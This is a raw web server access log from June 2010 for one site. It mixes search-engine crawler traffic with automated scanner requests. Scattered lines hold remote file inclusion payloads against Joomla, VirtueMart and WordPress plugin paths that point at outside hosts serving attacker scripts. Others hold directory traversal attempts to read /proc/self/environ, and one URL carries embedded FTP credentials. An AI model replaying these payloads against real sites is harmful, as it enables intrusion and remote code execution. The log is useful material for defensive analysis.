213.171.37.206 - - [27/Jun/2010:06:52:20 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
213.171.37.206 - - [27/Jun/2010:06:52:20 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.virtualsupplynet.com"
188.40.106.183 - - [27/Jun/2010:09:00:04 -0700] "GET /logs/access_100206.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.virtualsupplynet.com"
188.40.106.183 - - [27/Jun/2010:09:00:04 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.virtualsupplynet.com"
188.40.106.183 - - [27/Jun/2010:09:00:05 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.virtualsupplynet.com"
77.88.31.246 - - [27/Jun/2010:09:17:14 -0700] "GET /logs/access_100206.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
67.30.129.57 - - [27/Jun/2010:10:08:01 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
67.30.129.57 - - [27/Jun/2010:10:08:01 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
67.30.129.57 - - [27/Jun/2010:10:08:01 -0700] "GET /logs/access_100206.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.virtualsupplynet.com"
67.195.110.174 - - [27/Jun/2010:11:28:53 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [27/Jun/2010:11:28:58 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:48:39 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:48:39 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:49:45 -0700] "GET /?M=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:49:50 -0700] "GET /?S=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:49:59 -0700] "GET /?N=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:50:08 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:50:54 -0700] "GET /?N=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:50:57 -0700] "GET /?S=D HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:51:54 -0700] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:55:04 -0700] "GET /?D=A HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:55:05 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:55:12 -0700] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:56:56 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:56:57 -0700] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:58:26 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:58:26 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:11:58:59 -0700] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:12:00:20 -0700] "GET /logs/?N=D HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:12:08:26 -0700] "GET /logs/?D=A HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:12:08:48 -0700] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:12:09:18 -0700] "GET /logs/?N=A HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
184.73.82.101 - - [27/Jun/2010:12:09:21 -0700] "GET /logs/?D=D HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )" "www.virtualsupplynet.com"
95.108.150.235 - - [27/Jun/2010:12:17:31 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [27/Jun/2010:12:17:31 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [27/Jun/2010:12:17:32 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [27/Jun/2010:12:17:32 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
95.108.150.235 - - [27/Jun/2010:12:17:33 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.virtualsupplynet.com"
95.108.150.235 - - [27/Jun/2010:12:17:33 -0700] "GET / HTTP/1.1" 200 779 "-" "Yandex/1.01.001 (compatible; Win16; H)" "virtualsupplynet.com"
188.40.106.183 - - [27/Jun/2010:12:31:14 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.virtualsupplynet.com"
188.40.106.183 - - [27/Jun/2010:12:31:15 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.virtualsupplynet.com"
77.88.31.246 - - [27/Jun/2010:13:07:45 -0700] "GET /logs/access_100612.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
88.250.57.232 - - [27/Jun/2010:16:39:05 -0700] "GET /logs/access_100626.log HTTP/1.0" 200 104629 "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [27/Jun/2010:16:39:07 -0700] "GET /logs/access_100627.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
77.88.31.246 - - [27/Jun/2010:16:42:54 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
208.80.193.35 - - [27/Jun/2010:17:02:51 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; sbcydsl 3.12; .NET CLR 1.1.4322; yplus 5.1.04b)" "virtualsupplynet.com"
78.137.163.133 - - [27/Jun/2010:18:41:13 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.virtualsupplynet.com"
78.137.163.133 - - [27/Jun/2010:18:41:13 -0700] "GET /logs/access_090912.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.virtualsupplynet.com"
77.88.31.246 - - [27/Jun/2010:19:34:04 -0700] "GET /logs/access_100320.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
77.88.31.246 - - [27/Jun/2010:22:26:47 -0700] "GET /logs/access_100306.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
85.88.3.65 - - [28/Jun/2010:01:17:13 -0700] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://templatewinkel.nl/images/test? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.virtualsupplynet.com"
85.88.3.65 - - [28/Jun/2010:01:17:13 -0700] "GET /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://templatewinkel.nl/images/test? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.virtualsupplynet.com"
77.88.31.246 - - [28/Jun/2010:01:18:57 -0700] "GET /logs/access_100410.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
85.88.3.65 - - [28/Jun/2010:01:24:48 -0700] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://templatewinkel.nl/images/test? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.virtualsupplynet.com"
85.88.3.65 - - [28/Jun/2010:01:24:50 -0700] "GET /logs//wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://templatewinkel.nl/images/test? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.virtualsupplynet.com"
77.88.31.246 - - [28/Jun/2010:04:09:17 -0700] "GET /logs/access_100313.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.virtualsupplynet.com"
204.236.247.105 - - [28/Jun/2010:06:05:57 -0700] "HEAD / HTTP/1.1" 200 0 "-" "curl/7.18.2 (i486-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.8" "www.virtualsupplynet.com"
65.254.36.102 - - [28/Jun/2010:07:50:32 -0700] "GET /logs/index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
65.254.36.102 - - [28/Jun/2010:07:50:32 -0700] "GET /index2.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
65.254.36.102 - - [28/Jun/2010:07:51:22 -0700] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
65.254.36.102 - - [28/Jun/2010:07:51:22 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
77.72.200.38 - - [28/Jun/2010:08:56:34 -0700] "GET /logs/com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
77.72.200.38 - - [28/Jun/2010:08:56:34 -0700] "GET /com_sef&Itemid=&mosConfig.absolute.path=http://pastebin.com/raw.php?i=0qvxtQf6? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.virtualsupplynet.com"
77.88.31.246 - - [28/Jun/2010:11:15:54 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
208.80.193.30 - - [28/Jun/2010:13:57:06 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Creative ZENcast v1.02.10; ZangoToolbar 4.8.3)" "www.virtualsupplynet.com"
77.88.31.246 - - [28/Jun/2010:14:07:01 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
88.250.57.232 - - [28/Jun/2010:16:38:39 -0700] "GET /logs/access_100627.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [28/Jun/2010:16:38:39 -0700] "GET /logs/access_100628.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
77.88.31.246 - - [28/Jun/2010:16:57:51 -0700] "GET /logs/access_100130.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
77.88.31.246 - - [28/Jun/2010:19:47:07 -0700] "GET /logs/access_100213.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
67.195.110.174 - - [28/Jun/2010:21:28:07 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [28/Jun/2010:21:28:08 -0700] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
187.10.124.212 - - [28/Jun/2010:21:41:14 -0700] "GET /logs/access_100410.logftp:/baixe-admin:fgicad0ssn@ftp.baixe-aqui.info/httpdocs/test.php? HTTP/1.1" 404 - "-" "-" "www.virtualsupplynet.com"
187.10.124.212 - - [28/Jun/2010:21:41:14 -0700] "GET /logs/access_100515.logftp:/baixe-admin:fgicad0ssn@ftp.baixe-aqui.info/httpdocs/test.php? HTTP/1.1" 404 - "-" "-" "www.virtualsupplynet.com"
187.10.124.212 - - [28/Jun/2010:21:41:15 -0700] "GET /logs/access_100522.logftp:/baixe-admin:fgicad0ssn@ftp.baixe-aqui.info/httpdocs/test.php? HTTP/1.1" 404 - "-" "-" "www.virtualsupplynet.com"
192.228.230.3 - - [28/Jun/2010:22:19:30 -0700] "GET /logs/access.log HTTP/1.0" 200 39774 "-" "Mozilla/8.0" "www.virtualsupplynet.com"
77.88.31.246 - - [28/Jun/2010:22:37:36 -0700] "GET /logs/access_100327.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
67.195.110.174 - - [28/Jun/2010:23:32:26 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
117.53.96.161 - - [28/Jun/2010:23:44:10 -0700] "HEAD / HTTP/1.0" 200 0 "http://www.virtualsupplynet.com" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.virtualsupplynet.com"
212.95.58.188 - - [29/Jun/2010:00:02:33 -0700] "GET /templates/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "virtualsupplynet.com"
74.222.5.146 - - [29/Jun/2010:00:41:12 -0700] "GET /robots.txt HTTP/1.0" 404 - "http://www.virtualsupplynet.com/robots.txt" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
74.222.5.146 - - [29/Jun/2010:00:41:14 -0700] "GET / HTTP/1.0" 200 763 "http://www.virtualsupplynet.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.virtualsupplynet.com"
77.88.31.246 - - [29/Jun/2010:01:26:23 -0700] "GET /logs/access_100619.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
174.142.75.205 - - [29/Jun/2010:02:29:58 -0700] "GET /language/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
174.142.75.205 - - [29/Jun/2010:02:29:58 -0700] "GET /logs/language/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
208.80.193.37 - - [29/Jun/2010:03:01:38 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 6.0; Embedded Web Browser from: http://bsalsa.com/; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)" "virtualsupplynet.com"
77.88.31.246 - - [29/Jun/2010:04:13:43 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
174.129.165.204 - - [29/Jun/2010:05:37:19 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en_US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9" "virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:18:57 -0700] "HEAD /logs/ HTTP/1.1" 200 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:18:57 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:10 -0700] "HEAD /logs/access.log HTTP/1.1" 206 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:10 -0700] "GET /logs/access.log HTTP/1.1" 206 42644 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:10 -0700] "HEAD /logs/access_100206.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:10 -0700] "HEAD /logs/access_100213.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:11 -0700] "HEAD /logs/access_100220.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:11 -0700] "HEAD /logs/access_100227.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:11 -0700] "HEAD /logs/access_100306.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:11 -0700] "HEAD /logs/access_100313.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:12 -0700] "HEAD /logs/access_100320.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:12 -0700] "HEAD /logs/access_100327.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:12 -0700] "HEAD /logs/access_100403.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:12 -0700] "HEAD /logs/access_100410.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:12 -0700] "HEAD /logs/access_100417.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:13 -0700] "HEAD /logs/access_100424.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:13 -0700] "HEAD /logs/access_100501.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:13 -0700] "HEAD /logs/access_100508.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:13 -0700] "HEAD /logs/access_100515.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:14 -0700] "HEAD /logs/access_100522.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:14 -0700] "HEAD /logs/access_100529.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:14 -0700] "HEAD /logs/access_100605.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:14 -0700] "HEAD /logs/access_100612.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:14 -0700] "HEAD /logs/access_100619.log HTTP/1.1" 206 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:15 -0700] "GET /logs/access_100619.log HTTP/1.1" 206 114275 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:15 -0700] "HEAD /logs/access_100626.log HTTP/1.1" 206 0 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:16 -0700] "GET /logs/access_100626.log HTTP/1.1" 206 104629 "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
204.15.39.12 - - [29/Jun/2010:07:19:16 -0700] "HEAD /logs/scripts.log HTTP/1.1" 304 - "-" "Botslist Botfinder (+http://www.botslist.ca)" "www.virtualsupplynet.com"
77.88.31.246 - - [29/Jun/2010:09:05:34 -0700] "GET /logs/access_091121.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
203.251.80.167 - - [29/Jun/2010:10:31:02 -0700] "GET /logs//*.php?option=com_linkdirectory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
203.251.80.167 - - [29/Jun/2010:10:31:03 -0700] "GET /*.php?option=com_linkdirectory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.virtualsupplynet.com"
193.47.80.41 - - [29/Jun/2010:12:25:18 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
193.47.80.41 - - [29/Jun/2010:12:25:18 -0700] "GET /logs/ HTTP/1.1" 200 3798 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.virtualsupplynet.com"
77.88.31.246 - - [29/Jun/2010:13:40:50 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
67.195.110.174 - - [29/Jun/2010:15:37:41 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [29/Jun/2010:15:37:42 -0700] "GET /logs/ HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
67.195.110.174 - - [29/Jun/2010:15:40:24 -0700] "GET /logs/access_100619.log HTTP/1.0" 200 114275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.virtualsupplynet.com"
77.88.31.246 - - [29/Jun/2010:16:37:38 -0700] "GET /logs/access_100417.log HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.virtualsupplynet.com"
88.250.57.232 - - [29/Jun/2010:16:37:54 -0700] "GET /logs/access_100628.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
88.250.57.232 - - [29/Jun/2010:16:37:54 -0700] "GET /logs/access_100629.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "virtualsupplynet.com"
95.108.150.235 - - [29/Jun/2010:18:32:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
95.108.150.235 - - [29/Jun/2010:18:32:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.virtualsupplynet.com"
95.108.150.235 - - [29/Jun/2010:18:32:46 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "virtualsupplynet.com"
